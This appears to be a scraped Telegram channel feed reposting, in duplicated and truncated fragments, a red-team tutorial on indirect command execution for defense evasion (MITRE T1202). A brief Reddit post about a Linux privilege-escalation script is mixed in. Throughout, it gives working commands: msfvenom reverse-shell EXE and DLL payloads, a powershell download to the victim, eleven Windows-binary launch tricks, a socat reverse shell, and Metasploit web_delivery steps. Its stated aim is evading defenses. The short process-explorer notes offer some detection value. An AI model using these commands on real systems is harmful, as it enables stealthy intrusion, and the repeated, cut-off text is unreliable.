Hacking Articles Tips Tricks Videos Tutorials
L_hc7-1CHQ404D74LCutoYhe7GwGvmE_9ASKHjhcNS3ZEbzuQC20KgPbvcU00Gr7vb46oMQpb1m8ivIgmfxCn-sSMTL5luG1GsdSkIDrzgsWrgu-1xybOEH1wCVNsZNNhovGivuhG8claOn3RA=s16000 Method 4 - SyncAppvPublishingServer.vbsSyncAppvPublishingServer.vbs is a script available in newer versions…
e following values that indicate an icon to display in the notification.wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEhDq7ZEecb6yay2IZxMuoFnPveACrfzURZCOepDSRKeitTM9CjN412UoMl9keL3oz3Rlz1SbLX1uPC0M9Akch6B50n5TvAZpLWqHERGZbpz6-JHP9NpX2Ts2NnQColfZnIOZEax6v8h6IjENeP-38qZ_y1soCHZeRIscQjzwsvYhGel_1lV4uwGta1VPQ=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, shell.exe as a standalone has been spawned.Method 6 - explorer.exeExplorer.exe is the executable run when a user opens file manager. The path bar where current working directory is mentioned also serves as a run prompt kind of a thing where if you input name of a binary it spawns (like cmd.exe). Moreover, the binary is spawned as a child process of explorer.exe. This can be achieved via command line too.explorer.exe /root,"C:\Users\Public\shell.exe"https://blogger.googleusercontent.com/img/a/AVvXsEiFFhILJJ_58lfvZjDYd0KdOnRaGtKPj0YBmV9aEgR-zE3ZOFysO-OzBjF2XgRvigahG5IbVC1wgY5SVkvQUuFoGmXBXTo5mtiHa6Q94Rsla8zqAGXb3Yn8KIM_ZZ3wdkLclvpQlFVxDPRMU1Vfk9tHE3PY5aamA7iV3-0lbXV-mJPhAJzYqp-tw-KsEA=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, cmd.exe has been spawned which in turn runs our shell.exeMethod 7 - cmd.exeCmd.exe is the command prompt (terminal) of Windows and capable of executing binaries using the /c flag. One can indirectly execute a malicious file using cmd.exe like so:cmd.exe /c C:\Users\Public\shell.exeMoreover, an attacker may also benefit from the lesser-known path traversal execution method. This lets an attacker traverse back to explorer.exe and use that to initiate process for “shell.exe.” This complicates the analysis part for a blue teamer and is considered better than the previous method.cmd.exe /c "ignite.local /../../../../../../../../../../windows/explorer.exe" /root,C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEgqmG7357TPZiflCYNmR-zAn6A1_Fy8G6sZgPFJRQQ0gcxsS1YeyObFwBuPShBGCSLAXNkwb-niUD8FAGLb_Nh3kYO1BAnjHEBMhg_6xjpt_RG02tUr12Dl0AZyB_0a6OIeGmsgHDFVUVZaOljSQrPkueoHUPc82-EiU5qaSLEMrZdYkbDlNLHZKw_-JA=s16000 On our reverse listener [...]
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
e following values that indicate an icon to display in the notification.wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEhDq7ZEecb6yay2IZxMuoFnPveACrfzURZCOepDSRKeitTM9CjN412UoMl9keL3oz3…
set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost (masking our shell) has been spawned as a child process under explorer.exe process and is stealthier.Method 8 - ftp.exeNewer versions of Windows 10 and 11 come with an ftp.exe binary already included with the default installation. Moreover, it is available in the system PATH variable and can be executed from any working directory. Thereafter, we can load the command we want to run in a text file called “script.txt” and execute it using ftp -s option which executes text files as script. Hence, we include the explorer.exe command in this script and execute it using ftp.echo !explorer.exe /root,"C:\Users\Public\shell.exe" > script.txt && ftp -s:script.txthttps://blogger.googleusercontent.com/img/a/AVvXsEiPtvd4JhzWG5hmreHbVQzsP1qwQrYKijhJNHpHlrq7eE0OVHw1d0T4qbngV4qNN0s2T6Vp07JiFtcJkKBKjhYVVxI87UqN6SkXXCdkNXp79C582BQ0oKoCoX8r3pxgr1XkK1ypeQeJM1eVg_AwFlIf3Ocmesg_mmjHVbHtcK58AMflqyMHXjGcoAIlqg=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, an ftp instance is running with no notable indication of our shell.exe in processes making it stealthier.Method 9 - conhost.exeConhost.exe stands for Console Host which was introduced with Windows 7. It is sort of a bridge between old school CRSS and cmd.exe. More information can be found here. In simpler terms it helps Command Prompt to interact with Windows explorer and provides functionality like drag and drop text from explorer to cmd.exe.conhost "ignite.local C:\Users\Public\shell.exe"https://blogger.googleusercontent.com/img/a/AVvXsEjZZHpX82jke6s87hFOap2lQIqioMPgruyVXVcMW675bELlUzizx8J-3iwQkKGM5tq_JAasQQudoUjqob4gsiDF3L8_b4APEJaK4JKUyKBJtvy7Kp66yJVs6xuR6gLBtOz09NbkoB1qQ_219pT7LoGLsB5vLGxiIkdIXg19hGOiVhVZNBgvJoh_KC_emQ=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that sh[...]
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see…
ould make him suspicious. As you can see, a conhost instance has been launched within a cmd.exe process. It is stealthy as compared to other methods as shell.exe isn’t seen in the process explorer.Method 10 - WSL Only (bash.exe)The next two methods are use-case specific. WSL stands for Windows Subsystem for Linux and can help a user install an instance of their favourite Linux distro onto Windows itself by creating a subsystem. Here, the victim has installed an Ubuntu instance in WSL. It can be installed by instructions provided here. bash.exe -c "socat tcp-connect:192.168.0.89:4444 exec:sh,pty,stderr,setsid,sigint,sane"https://blogger.googleusercontent.com/img/a/AVvXsEjlMqohYTCrWXdeE1EMDrJ1_TWQue_NK4InmPw6KRGLtY3_b-AaWZBkvtuM6wym4XFN_jE9HwdVYw79JNFW1Ss-9Su37do4nyhF6rNLhSdtDV_4T6o-qu3uZ_tc9-KdFHQsLdzVbUsbgrj-wKzz9q23GD3zK7_paGAHXWyGHvkGeJ0olVrwci-W4Mt0iA=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, wsl.exe process has been launched under which conhost is initiated along with a socat and bash process. It is stealthy.Method 11 - WSL Only (wsl.exe)Socat instance on a WSL is plausible but not necessary. However, an executable called wsl.exe is present by default in Windows system where WSL is installed. This exe can be used to launch the exe present in WSL. This way, the shell will be launched indirectly.wsl.exe -e /mnt/c/Users/Public/shell.exehttps://blogger.googleusercontent.com/img/a/AVvXsEjx-BRKTlxOyVryZf57AMZchGXcj8MIPICRgIjiT0Wrob-TVJHe2wqbMuHI4v4LvsQ6OVKHP50p7vkBKzjFJAgDCG-RTL4XsQgYLUnAt0OrR8rF6OfqZ61F1zmmgc9oCxWXcRZDpQLlRHzZOyl5uJv5qdNtGYyAkemBjiO8F79cqPLoCsQRSCGEWjOkjw=s16000 On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, wsl.exe process has been launched under which conhost is initiated along with a shell.exe process. It is not as stealthy as other methods.___________________________
@hacking_Attack
@Hacking_Video
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
ould make him suspicious. As you can see, a conhost instance has been launched within a cmd.exe process. It is stealthy as compared to other methods as shell.exe isn’t seen in the process explorer.Method 10 - WSL Only (bash.exe)The next two methods are use…
XuJ9PAkzu6pOSe4Tw=s16000 ConclusionWhile some of the methods defined above are stealthy, others create some noise. Red Teamers must evaluate which method they want to use in order for them to conduct operations smoothly. The aim of the article was to demonstrate as many methods as possible for indirect command execution in order for a user to evade defenses easily. Hope you liked the article. Thanks for reading.___________________________
@hacking_Attack
@Hacking_Video
@hacking_Attack
@Hacking_Video
Linux Smart Enumeration now also checks for CVEs
https://www.reddit.com/r/Pentesting/comments/tggvpa/linux_smart_enumeration_now_also_checks_for_cves/
The Linux privesc script Linux Smart Enumeration now checks also for CVEs. Hopefully it will work better than other CVE suggesters. More info here: https://www.treitos.com/blog/2022/testing-for-cves-in-linux-smart-enumeration.html submitted by /u/obranco (https://www.reddit.com/user/obranco)
[link] (https://www.reddit.com/r/Pentesting/comments/tggvpa/linux_smart_enumeration_now_also_checks_for_cves/) [comments] (https://www.reddit.com/r/Pentesting/comments/tggvpa/linux_smart_enumeration_now_also_checks_for_cves/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/tggvpa/linux_smart_enumeration_now_also_checks_for_cves/
The Linux privesc script Linux Smart Enumeration now checks also for CVEs. Hopefully it will work better than other CVE suggesters. More info here: https://www.treitos.com/blog/2022/testing-for-cves-in-linux-smart-enumeration.html submitted by /u/obranco (https://www.reddit.com/user/obranco)
[link] (https://www.reddit.com/r/Pentesting/comments/tggvpa/linux_smart_enumeration_now_also_checks_for_cves/) [comments] (https://www.reddit.com/r/Pentesting/comments/tggvpa/linux_smart_enumeration_now_also_checks_for_cves/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Linux Smart Enumeration now also checks for CVEs
The Linux privesc script Linux Smart Enumeration now checks also for CVEs. Hopefully it will work better than other CVE suggesters. More info...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Indirect Command Execution: Defense Evasion (T1202)
IntroductionIndirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense filters put in place which may restrict certain types of scripts/executables from running. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, if a firewall is restricting DLL execution, it can be bypassed using a procdump method or if there is a whitelist on certain executables containing pcalua.exe, it can be used to execute other executables. Some of these methods are discussed in this article.
MITRE TACTIC: Defense Evasion (TA0005)
MITRE TECHNIQUE ID: T1202 (Indirect Command Execution) Table of content* Malicious EXE creation
* Method 1 – forfiles.exe
* Method 2 – pcalua.exe
* Method 3 – procdump.exe (DLL method)
* Method 4 – SyncAppvPublishingServer.vbs
* Method 5 – wlrmdr.exe
* Method 6 – explorer.exe
* Method 7 – cmd.exe
* Method 8 – ftp.exe
* Method 9 – conhost.exe
* Method 10 – WSL Only (bash.exe)
* Method 11 – WSL Only (wsl.exe)
* Conclusion Malicious EXE CreationFirst, we need to create an executable that will be executed. This is a simple simulation of what might happen in a real-time Red Team scenario. We’ll use msfvenom to create a simple reverse shell. After that, we need to upload this exe into the victim machine using a python server.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.89 LPORT=4444 -f exe > shell.exe
python3 -m http.server 80
https://blogger.googleusercontent.com/img/a/AVvXsEj-wuREGwPxvcNPuPqJBQSjxC7mqPPUdZ2SZZfje33Cs8Z2wDXP1SNQbkWiXJny5VCM9GHzg5H1tSqY4X01wzn4B_siFHCn_Uc16ZI92hh4uAv5GGAX4PC1A45Ezc_U9iBT-i2NCN4YEKIQAdMnVyT2DsB7qZhVTEo0GaoZHPnSc34Vecgj3THrREEytA=s16000
Now, we can upload this executable to the already compromised victim device using powershell wget
powershell wget 192.168.0.89/shell.exe -O C:\Users\Public\shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEj0qdPyyS3MywzDFfFtiSNsAdEK1KRIvU_itwrr7rBaJxq9Tc8HptN8XNGZnjfyn7SHcNf4L_MfRBbBgpVu-S7JJA9SwSAbzAItBFlBCI6ebzpywsJnZoJ5_WkJGxLO_MtTiVlnf6-NW6vFo-aHIK44lHqSkG4kYg-8ATKH_f2WTZ34OM5itsWNEww3lA=s16000
Now, the file is uploaded in the C:\Users\Public directory for further use. Method 1 – forfilesAccording to Microsoft, “Selects and runs a command on a file or set of files. This command is most commonly used in batch files.” Here, /p specifies the path where forfiles will search for the search mask defined by /m flag (here, calc.exe). However, anything after the /c flag is the actual command. Hence, forfiles will now run our custom-made shell.
forfiles /p c:\windows\system32 /m calc.exe /c C:\Users\Public\shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEiAQkSEph-Yc7qfWnPbuDvEXL2O5EWeynYdO3ByEBrDh2VzVAkpKiqsLALM3IdLE3cbZjYIacm8r5KivBkLkzFwX2PovXI1ssUoErvec6RhVjcBvNsmeiL2tOKn_8Knf6us7DQwkSfTKxynKkVqnkAKuDbN1noEKPPRKTehBSmFS0A3X8df9Oih3irzag=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEiFj9B8mLP1mapteNLUrDoYnleVfqJougEFcubjAUkgfl7tnrf7FA1gKsGSlKzuKAfgQ4QZE-8KxBAi74goclhGXhWqj76lNkmMyTO6FCwEcIqiiCSuF11C-bFNI74W7xQEu1kL6PAqmgqhnJDVT48Y7Bwwxhle_JV3_TH2dWftrbySKhf0EuBqpNJL-Q=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, forfiles.exe is running a suspicious file “shell.exe”
https://blogger.googleusercontent.com/img/a/AVvXsEg4s6koj12bPmUKjSqanBl-hJM4PrxBnezPRNOj4EQmGwJzl2aDknPRCWoSc0vbtN488-yJjNykpCpywHBCtZNZ_Xis6xSYMgmyz25a9Dv-fLHrWwtmWZt-3CIcBM6HOhKbZQVfNS7G22aOgxJIolm9xHnjMh16Q-oC8Ahu7p98VNdYXTnkTWmXK8Xw-[...]
___________________________
@hacking_Attack
@Hacking_Video
Indirect Command Execution: Defense Evasion (T1202)
IntroductionIndirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense filters put in place which may restrict certain types of scripts/executables from running. Various Windows utilities may be used to execute commands, possibly without invoking cmd. For example, if a firewall is restricting DLL execution, it can be bypassed using a procdump method or if there is a whitelist on certain executables containing pcalua.exe, it can be used to execute other executables. Some of these methods are discussed in this article.
MITRE TACTIC: Defense Evasion (TA0005)
MITRE TECHNIQUE ID: T1202 (Indirect Command Execution) Table of content* Malicious EXE creation
* Method 1 – forfiles.exe
* Method 2 – pcalua.exe
* Method 3 – procdump.exe (DLL method)
* Method 4 – SyncAppvPublishingServer.vbs
* Method 5 – wlrmdr.exe
* Method 6 – explorer.exe
* Method 7 – cmd.exe
* Method 8 – ftp.exe
* Method 9 – conhost.exe
* Method 10 – WSL Only (bash.exe)
* Method 11 – WSL Only (wsl.exe)
* Conclusion Malicious EXE CreationFirst, we need to create an executable that will be executed. This is a simple simulation of what might happen in a real-time Red Team scenario. We’ll use msfvenom to create a simple reverse shell. After that, we need to upload this exe into the victim machine using a python server.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.89 LPORT=4444 -f exe > shell.exe
python3 -m http.server 80
https://blogger.googleusercontent.com/img/a/AVvXsEj-wuREGwPxvcNPuPqJBQSjxC7mqPPUdZ2SZZfje33Cs8Z2wDXP1SNQbkWiXJny5VCM9GHzg5H1tSqY4X01wzn4B_siFHCn_Uc16ZI92hh4uAv5GGAX4PC1A45Ezc_U9iBT-i2NCN4YEKIQAdMnVyT2DsB7qZhVTEo0GaoZHPnSc34Vecgj3THrREEytA=s16000
Now, we can upload this executable to the already compromised victim device using powershell wget
powershell wget 192.168.0.89/shell.exe -O C:\Users\Public\shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEj0qdPyyS3MywzDFfFtiSNsAdEK1KRIvU_itwrr7rBaJxq9Tc8HptN8XNGZnjfyn7SHcNf4L_MfRBbBgpVu-S7JJA9SwSAbzAItBFlBCI6ebzpywsJnZoJ5_WkJGxLO_MtTiVlnf6-NW6vFo-aHIK44lHqSkG4kYg-8ATKH_f2WTZ34OM5itsWNEww3lA=s16000
Now, the file is uploaded in the C:\Users\Public directory for further use. Method 1 – forfilesAccording to Microsoft, “Selects and runs a command on a file or set of files. This command is most commonly used in batch files.” Here, /p specifies the path where forfiles will search for the search mask defined by /m flag (here, calc.exe). However, anything after the /c flag is the actual command. Hence, forfiles will now run our custom-made shell.
forfiles /p c:\windows\system32 /m calc.exe /c C:\Users\Public\shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEiAQkSEph-Yc7qfWnPbuDvEXL2O5EWeynYdO3ByEBrDh2VzVAkpKiqsLALM3IdLE3cbZjYIacm8r5KivBkLkzFwX2PovXI1ssUoErvec6RhVjcBvNsmeiL2tOKn_8Knf6us7DQwkSfTKxynKkVqnkAKuDbN1noEKPPRKTehBSmFS0A3X8df9Oih3irzag=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEiFj9B8mLP1mapteNLUrDoYnleVfqJougEFcubjAUkgfl7tnrf7FA1gKsGSlKzuKAfgQ4QZE-8KxBAi74goclhGXhWqj76lNkmMyTO6FCwEcIqiiCSuF11C-bFNI74W7xQEu1kL6PAqmgqhnJDVT48Y7Bwwxhle_JV3_TH2dWftrbySKhf0EuBqpNJL-Q=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, forfiles.exe is running a suspicious file “shell.exe”
https://blogger.googleusercontent.com/img/a/AVvXsEg4s6koj12bPmUKjSqanBl-hJM4PrxBnezPRNOj4EQmGwJzl2aDknPRCWoSc0vbtN488-yJjNykpCpywHBCtZNZ_Xis6xSYMgmyz25a9Dv-fLHrWwtmWZt-3CIcBM6HOhKbZQVfNS7G22aOgxJIolm9xHnjMh16Q-oC8Ahu7p98VNdYXTnkTWmXK8Xw-[...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles
Indirect Command Execution: Defense Evasion (T1202)
Learn how indirect command execution enables defense evasion with tools like forfiles, pcalua, procdump, and more.
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles Indirect Command Execution: Defense Evasion (T1202) IntroductionIndirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense filters put in place which may…
g=s16000 Method 2 – pcalua.exeThe Program Compatibility Assistant is an automatic feature of Windows that runs when it detects an older program has a compatibility problem. Because of the utility of this executable, this is more often whitelisted in the systems. This can also run custom exe in compatibility mode. We can run our executable using the program with “-a” flag like:
pcalua.exe -a C:\Users\Public\shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEi2uq-rNPAJI1FAjDYWp8n-ymHR3EtUbDZmYK07bnDsdVIcsoaoFwcs9Ju2fXIrsuG6uMQ7MrM8YoIRGdUUa8Tt-B-6JpiooWW1eE_eEgu6nsrU4N3VWaAUKMUcJSwhNziYoSfZ4xeS4Q7tlO25kUEcfG4VoEYjASE450YnMM3Tu8P94edsT8Lu5jNjIg=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEgyveqzleXR6zalt5plQopUW2PPp27R3k8GwORVU4p1Af9tHCxC5m9vCTneAsHFTePqYyQowwGTx5BlcsyvldUy-okCZMB2e-leC2H7aWwVFCZpWFk3WrYpR8kqTuVm1vWvh3kcPYy-eXNOHNsvM8OthqoQZMAb53HD8nQnHmkgd9A59m4DT01CJuuB6Q=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, shell.exe has spawned as a standalone process.
https://blogger.googleusercontent.com/img/a/AVvXsEjnZbFzKAkDXV3IgLCpDxDWOjcEyHgrrFaxnIRXa63G8bEXOiM7VtTXi1ieZghS8xLvN56CgVfnhulvhuES_EqjZC3fP9zcqpTnF8VnLM_vy8O_y15nlzPQdB9odSu5W9kyGu93dadEZKPV8zrvJPA1FHjO3eLkidjrZ2jwvRBV8SuiSK-APtEvYcwkog=s16000 Method 3 – procdump.exe (DLL method)ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. This binary, developed by sysinternals team, can also be used to execute a DLL file by utilizing the ‘MiniDumpCallbackRoutine’ exported function. A valid ongoing process has to be provided as the memory dump of that process will be created while loading this DLL onto it.
First, we need to create our DLL payload using msfvenom
msfvenom -p windows/shell_reverse_tcp -f dll LHOST=192.168.0.89 LPORT=4444 > shell.dll
https://blogger.googleusercontent.com/img/a/AVvXsEhYLRSUHzHTxEMpK2LIzGRWmD6UbwDEtDr_-FOxwBofbNV4C9ADkGqxO96zlw-a5wFg3qchVFqu1B2dhoEP02Mzhz4n-yZe1jgfQhQZkMAmy0dOHHNHwM6RQ7A6HaonIXuq7NNEOM47KGGqKA5dZiyO9XQyQdAUInuM5gXdZvfYdUzqSrjprivb4Dy2oA=s16000
Once, the DLL has been uploaded onto the victim system, using python server and powershell wget utility, procdump can be run with the “-md” option
C:\Sysinternals\procdump.exe -md shell.dll explorer.exe
https://blogger.googleusercontent.com/img/a/AVvXsEixa5wAW8UKBgZ2gamovgJFlUMAD9YAW1K6YRX0oKhB69vd9n_qo9hqJ6MvZ9z6yoYoxtFI8S8WjnhnZwgx2J97B6HgpbXioBs72hqUX4K0pX3lAMOKhhgbG_QRnXtmMkhnN4wR4pRv1ImstkPWD3W3b3urkf2Ez9wB094VQWjIZgbJGXnItKyfJ6UYCA=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEjDVx8YrFP-uqZA4GDzLFJW1ia0j3vLR6ahCpMVbiyWt7eWtAK2xaqvnFKWwScdboguA5ERvR9xn6BnwCJ6TOoKayTWwVocWY82kIFKPfXbCUTZlKJmm8IHDNkr-UNWazfIJXQrj9pxLZ2wMYFuvDLQ5pTzopBbDsGAjsL32o5p0ZYZMB81hjOl0mMtYg=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, our DLL has been executed using rundll as a child process of procdump.
https://blogger.googleusercontent.com/img/a/AVvXsEjrKO0fVMQsSrwbDt3WiXoICik3AThUP3oDu4ZeEVQML_hc7-1CHQ404D74LCutoYhe7GwGvmE_9ASKHjhcNS3ZEbzuQC20KgPbvcU00Gr7vb46oMQpb1m8ivIgmfxCn-sSMTL5luG1GsdSkIDrzgsWrgu-1xybOEH1wCVNsZNNhovGivuhG8claOn3RA=s16000 Method 4 – SyncAppvPublishingServer.vbsSyncAppvPublishingServer.vbs is a script available in newer versions on Windows 10 and 11 only. This is developed by Microsoft and can be used for MS Application Virtualization. It [...]
___________________________
@hacking_Attack
@Hacking_Video
pcalua.exe -a C:\Users\Public\shell.exe
https://blogger.googleusercontent.com/img/a/AVvXsEi2uq-rNPAJI1FAjDYWp8n-ymHR3EtUbDZmYK07bnDsdVIcsoaoFwcs9Ju2fXIrsuG6uMQ7MrM8YoIRGdUUa8Tt-B-6JpiooWW1eE_eEgu6nsrU4N3VWaAUKMUcJSwhNziYoSfZ4xeS4Q7tlO25kUEcfG4VoEYjASE450YnMM3Tu8P94edsT8Lu5jNjIg=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEgyveqzleXR6zalt5plQopUW2PPp27R3k8GwORVU4p1Af9tHCxC5m9vCTneAsHFTePqYyQowwGTx5BlcsyvldUy-okCZMB2e-leC2H7aWwVFCZpWFk3WrYpR8kqTuVm1vWvh3kcPYy-eXNOHNsvM8OthqoQZMAb53HD8nQnHmkgd9A59m4DT01CJuuB6Q=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, shell.exe has spawned as a standalone process.
https://blogger.googleusercontent.com/img/a/AVvXsEjnZbFzKAkDXV3IgLCpDxDWOjcEyHgrrFaxnIRXa63G8bEXOiM7VtTXi1ieZghS8xLvN56CgVfnhulvhuES_EqjZC3fP9zcqpTnF8VnLM_vy8O_y15nlzPQdB9odSu5W9kyGu93dadEZKPV8zrvJPA1FHjO3eLkidjrZ2jwvRBV8SuiSK-APtEvYcwkog=s16000 Method 3 – procdump.exe (DLL method)ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. This binary, developed by sysinternals team, can also be used to execute a DLL file by utilizing the ‘MiniDumpCallbackRoutine’ exported function. A valid ongoing process has to be provided as the memory dump of that process will be created while loading this DLL onto it.
First, we need to create our DLL payload using msfvenom
msfvenom -p windows/shell_reverse_tcp -f dll LHOST=192.168.0.89 LPORT=4444 > shell.dll
https://blogger.googleusercontent.com/img/a/AVvXsEhYLRSUHzHTxEMpK2LIzGRWmD6UbwDEtDr_-FOxwBofbNV4C9ADkGqxO96zlw-a5wFg3qchVFqu1B2dhoEP02Mzhz4n-yZe1jgfQhQZkMAmy0dOHHNHwM6RQ7A6HaonIXuq7NNEOM47KGGqKA5dZiyO9XQyQdAUInuM5gXdZvfYdUzqSrjprivb4Dy2oA=s16000
Once, the DLL has been uploaded onto the victim system, using python server and powershell wget utility, procdump can be run with the “-md” option
C:\Sysinternals\procdump.exe -md shell.dll explorer.exe
https://blogger.googleusercontent.com/img/a/AVvXsEixa5wAW8UKBgZ2gamovgJFlUMAD9YAW1K6YRX0oKhB69vd9n_qo9hqJ6MvZ9z6yoYoxtFI8S8WjnhnZwgx2J97B6HgpbXioBs72hqUX4K0pX3lAMOKhhgbG_QRnXtmMkhnN4wR4pRv1ImstkPWD3W3b3urkf2Ez9wB094VQWjIZgbJGXnItKyfJ6UYCA=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEjDVx8YrFP-uqZA4GDzLFJW1ia0j3vLR6ahCpMVbiyWt7eWtAK2xaqvnFKWwScdboguA5ERvR9xn6BnwCJ6TOoKayTWwVocWY82kIFKPfXbCUTZlKJmm8IHDNkr-UNWazfIJXQrj9pxLZ2wMYFuvDLQ5pTzopBbDsGAjsL32o5p0ZYZMB81hjOl0mMtYg=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, our DLL has been executed using rundll as a child process of procdump.
https://blogger.googleusercontent.com/img/a/AVvXsEjrKO0fVMQsSrwbDt3WiXoICik3AThUP3oDu4ZeEVQML_hc7-1CHQ404D74LCutoYhe7GwGvmE_9ASKHjhcNS3ZEbzuQC20KgPbvcU00Gr7vb46oMQpb1m8ivIgmfxCn-sSMTL5luG1GsdSkIDrzgsWrgu-1xybOEH1wCVNsZNNhovGivuhG8claOn3RA=s16000 Method 4 – SyncAppvPublishingServer.vbsSyncAppvPublishingServer.vbs is a script available in newer versions on Windows 10 and 11 only. This is developed by Microsoft and can be used for MS Application Virtualization. It [...]
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
g=s16000 Method 2 – pcalua.exeThe Program Compatibility Assistant is an automatic feature of Windows that runs when it detects an older program has a compatibility problem. Because of the utility of this executable, this is more often whitelisted in the systems.…
can also be indirectly used for executing EXE. This is achieved by .NET cmdlet known as “Start-Process”
SyncAppvPublishingServer.vbs "n; Start-Process C:\Users\Public\shell.exe"
https://blogger.googleusercontent.com/img/a/AVvXsEi51JoJQetwyc_mQt5oHfHeaLdXODKEBhwAzqEuPnL5RLdURtBBspCS68pMrxpf5MjPOGhfkptKIy6cz8ihry6a9hnMROJK5SEGvIz6Bmpkv4csZmpG8j_o2KYX-yAgbukHtBFV_xbuKaSLUIGphmba-zgbyNBjrDeocGNK8PmBplQv5wfIhgV3FPFW-A=s16000
On our reverse listener set up on port 4444, we receive a connection as the shell gets executed!
https://blogger.googleusercontent.com/img/a/AVvXsEijX6I0yLkAnhOzf9EhO9FoSLZpxFt4757t-6KkFjxxEAnvXtPDuXAERujjyg-ujKDqAV-D5V5gSmpTTuKFwkCSLtHpGyYmwCne6Y0fQucARcXdWYUFcClMhVdi1W6pbpqLAt4o1_IUFDRNY1Plj-9UYO23aOtc49ZMWZglh_HMuc3bTzNtbDvHHWm6Xw=s16000
Inspection in process explorer: In the victim system, if an analyst checks process explorer, he shall see the following processes running that should make him suspicious. As you can see, a conhost has been spawned inside a powershell process.
https://blogger.googleusercontent.com/img/a/AVvXsEi7EEmM0KIO-tgMkRAm1Bx-1buqfjYzlJr9I-078FRm7f_S6skSP7euJRH2VOdihTbA2wgwkV6OX9sN21QFHGVrqWEw3nz4NN2OQXvOty_Vi_Z-WhY3CIHrsuog4rMJxvWeJLRjAtJRM-MwhkPzm7RHnNBXqXNfIlshJgd3djMQjCEsZTSHvd_d6p8ihQ=s16000
Since just passing in the exe’s path can make the VBS script execute it, we can also use the regsrv32 method in Metasploit.
use multi/script/web_delivery
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.89
set lport 1337
set target 3
run
https://blogger.googleusercontent.com/img/a/AVvXsEi1xPz1hS2IxgvCBLTQ3ygUnFXIrcP0KhK2TuMuniUkcE0FZI3CfAj6tsQUKZ1uaTaQd4vHW_2bShfwrw_vLnbM0DIGOlhqHnJPWu8upLlts-f1AWYxBFjxar-ubp_ezlGCmKesJhAQbdh2f6M99MVqx66G9BCpCzt3O9qttCfaalQaRC4MV37ciQLBiQ=s16000
Now, we can inject this command into the SyncAppvPublishingServer.vbs script by giving a break clause and then the one liner.
